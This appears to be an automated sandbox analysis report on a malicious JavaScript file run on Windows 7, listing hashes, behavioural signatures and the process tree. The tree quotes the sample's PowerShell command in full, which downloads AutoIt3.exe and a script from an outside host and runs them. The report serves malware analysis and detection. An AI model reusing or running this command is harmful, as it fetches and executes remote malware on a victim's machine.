Analysis
-
max time kernel
118s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system -
submitted
25/10/2023, 17:27
Static task
static1
Behavioral task
behavioral1
Sample
1b2bfebd6093d8d95a03b4f732f89903ae6f828b292ab5765d0091b1.js
Resource
win7-20231020-en
4 signatures
150 seconds
General
-
Target
1b2bfebd6093d8d95a03b4f732f89903ae6f828b292ab5765d0091b1.js
-
Size
135KB
-
MD5
a509ba7ed20b627448a220c2924d3a07
-
SHA1
4b2cc002217a95e42fa0d7b49ef5688ca186e74f
-
SHA256
21d51086d7aa99d7d96a5e9aa196da720fcf526fbe2421972e1c3555bb84fc8c
-
SHA512
9bfb1c14168d4ed73a6bd01eee819939676c412c0e3729d455b3f63df1eefa7607ddc5074ac69123b17660d2264343dd8afed089f123b6cf41c742bd681ec544
-
SSDEEP
1536:BZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/0m:0T9U7hgaX6eerjqlI2IO6MzqfJAl
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid   Process
2112  powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description              pid   Process
Token: SeDebugPrivilege  2112  powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description                        pid   Process      procid_target
PID 2200 wrote to memory of 2112   2200  wscript.exe  28
PID 2200 wrote to memory of 2112   2200  wscript.exe  28
PID 2200 wrote to memory of 2112   2200  wscript.exe  28
Processes
-
C:\Windows\system32\wscript.exe
Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\1b2bfebd6093d8d95a03b4f732f89903ae6f828b292ab5765d0091b1.js
Tree depth: 1
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/temp' -Type Directory -Force;cd 'C:/temp'; Invoke-WebRequest -Uri 'http://sftp.bitepieces.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.bitepieces.com:443/msirzskfhle' -OutFile 'rzskfhle.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'rzskfhle.au3'"
Tree depth: 2 (child of PID 2200)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112
-